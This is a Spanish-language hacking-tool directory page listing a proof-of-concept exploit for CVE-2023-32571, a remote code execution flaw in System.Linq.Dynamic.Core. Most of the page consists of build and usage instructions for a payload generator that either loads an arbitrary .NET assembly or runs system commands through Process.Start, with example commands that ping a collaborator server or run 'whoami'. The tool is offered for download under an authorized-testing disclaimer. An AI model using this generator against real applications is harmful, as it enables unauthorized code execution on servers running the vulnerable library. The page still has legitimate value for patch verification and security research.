Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-32571 — Prueba de concepto para CVE-2023-32571 | Kitploit
Herramientas/GitHubGitHub/sectex/cve-2023-32571
Generación de PayloadsAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebAprendizaje y Educación
GitHubsectex/cve-2023-32571

CVE-2023-32571

Prueba de concepto para CVE-2023-32571

Ver Repositorio
hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🐞 CVE-2023-32571 - Ejecución remota de código en System.Linq.Dynamic.Core

Prueba de concepto para CVE-2023-32571, una vulnerabilidad de ejecución remota de código en System.Linq.Dynamic.Core (1.0.7.10 a 1.2.25). Esta vulnerabilidad permite a los atacantes ejecutar código y comandos arbitrarios cuando se analizan entradas no confiables en métodos como Where, Select, OrderBy.

⚠️ Descargo de responsabilidad

Esta herramienta se proporciona únicamente con fines educativos y de pruebas autorizadas. El uso de esta herramienta para atacar objetivos sin consentimiento mutuo previo es ilegal. Los desarrolladores no asumen ninguna responsabilidad ni se hacen responsables de cualquier uso indebido o daño causado por este programa.

🎯 Requisitos previos

  • SDK de .NET 9.0 o posterior
  • Aplicación objetivo que utilice una versión vulnerable de System.Linq.Dynamic.Core (1.0.7.10 a 1.2.25)
  • Un servidor colaborador (por ejemplo, Burp Collaborator, Interactsh) para observar los callbacks

🛠️ Compilación del proyecto

  1. Compile el proyecto:
    root@kitploit:~
    dotnet build --configuration Release
    
    La compilación generará
    • El payload DLL en Payload/bin/Release/netstandard2.0/Payload.dll
    • El generador de payload en Generator/bin/Release/net9.0/Generator.dll

🚀 Uso

Modos

La herramienta admite dos modos:

  1. AssemblyLoad (Modo 0): Cargar y ejecutar un ensamblado .NET personalizado
  2. ProcessStart (Modo 1): Ejecutar comandos del sistema directamente mediante Process.Start

Modo 0: AssemblyLoad (Predeterminado)

root@kitploit:~
# Using Base64 encoding
./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<your-collaborator-url>\"" --encoding 1

# Using Hex encoding
./Generator --mode 0 --file Payload.dll --type Payload --parameters "\"<your-collaborator-url>\"" --encoding 0
root@kitploit:~
# Using Base64 encoding
Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<your-collaborator-url>`"" --encoding 1

# Using Hex encoding
Generator.exe --mode 0 --file Payload.dll --type Payload --parameters "`"<your-collaborator-url>`"" --encoding 0

Modo 1: ProcessStart (Ejecución directa de comandos)

root@kitploit:~
# Windows command execution
./Generator --mode 1 --parameters "cmd.exe /c ping <your-collaborator-url>"

# Linux command execution  
./Generator --mode 1 --parameters "bash -c ping <your-collaborator-url>"

⚙️ Parámetros

  • --mode: Modo de explotación (0=AssemblyLoad, 1=ProcessStart)
  • --file: Ruta al ensamblado .NET que se va a cargar (obligatorio para el modo AssemblyLoad)
  • --type: Nombre de tipo totalmente calificado que se va a instanciar (obligatorio para el modo AssemblyLoad)
  • --parameters: Parámetros según el modo:
    • AssemblyLoad: Parámetros del constructor (separados por comas)
    • ProcessStart: Comando a ejecutar (por ejemplo, 'cmd.exe /c whoami' o 'bash -c whoami')
  • --encoding: Método de codificación para el modo AssemblyLoad (0=Hex, 1=Base64)

📚 Referencias

  • NIST NVD
  • NCCGROUP Advisory
  • System.Linq.Dynamic.Core GitHub Repository
Descargar herramienta